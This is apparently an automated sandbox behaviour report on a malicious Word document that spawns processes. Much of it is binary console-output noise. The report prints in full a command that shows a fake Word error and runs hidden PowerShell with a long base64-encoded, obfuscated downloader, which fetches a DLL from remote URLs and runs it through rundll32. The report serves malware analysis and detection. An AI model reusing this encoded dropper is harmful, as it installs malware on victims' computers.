Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ..............................}..v....X.......0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................f..j....................................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................f..j......~.............................}..v............0.r.............8.~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j..... ..............................}..v............0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j.....H~.............................}..v....X.......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.r.............XE~.....(.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[...............&..j....`...............................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.r.............XE~.....$.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g...............&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................E..........................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....H~.............................}..v....."......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............&..j.....#..............................}..v....($......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....H~.............................}..v.....*......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............&..j.....+..............................}..v....(,......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....H~.............................}..v.....2......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............&..j.....3..............................}..v....(4......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....H~.............................}..v.....:......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............&..j.....;..............................}..v....(<......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....H~.............................}..v.....B......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............&..j.....C..............................}..v....(D......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j.....H~.............................}..v.....J......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............&..j.....K..............................}..v....(L......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j.....H~.............................}..v.....R......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............&..j.....S..............................}..v....(T......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j.....H~.............................}..v.....Z......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............&..j.....[..............................}..v....(\......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....b......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....c..............................}..v....(d......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....j......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....k..............................}..v....(l......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....r......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....s..............................}..v....(t......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v.....z......0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j.....{..............................}..v....(\|......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v....(.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................&..j....................................}..v.... .......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j.....H~.............................}..v............0.r.............................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....H~.............................}..v....P.......0.r.....................r.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............&..j....................................}..v............0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;....... ..........j.....H~.............................}..v............0.r.............XE~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;...............&..j....................................}..v....P.......0.r..............E~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E...............................}..v......5.....0.r...............~.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....E...............................}..v....0.5.....0.r...............~.............................	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1

Source: Doc.doc	Virustotal: Detection: 69%
Source: Doc.doc	ReversingLabs: Detection: 82%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lkvi\ejqhpm.twa',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yffe\xmxs.xtt',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yxkq\vxcyp.vst',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Glql\mritqo.dtl',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xlll\midsk.ptl',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qpvq\ojxkj.pqe',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qfbx\wpmmbwy.jek',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ljbn\kwuw.ehe',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ghjb\hjdxzl.ejj',RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Doth\isebmn.lpx',RunDLL
